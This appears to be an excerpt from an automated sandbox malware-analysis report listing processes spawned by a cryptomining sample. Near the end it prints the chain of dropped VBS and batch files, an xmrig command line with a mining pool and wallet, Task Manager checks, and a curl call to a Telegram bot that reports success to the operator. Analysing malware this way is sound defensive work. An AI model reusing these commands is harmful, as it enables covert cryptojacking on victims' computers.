Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
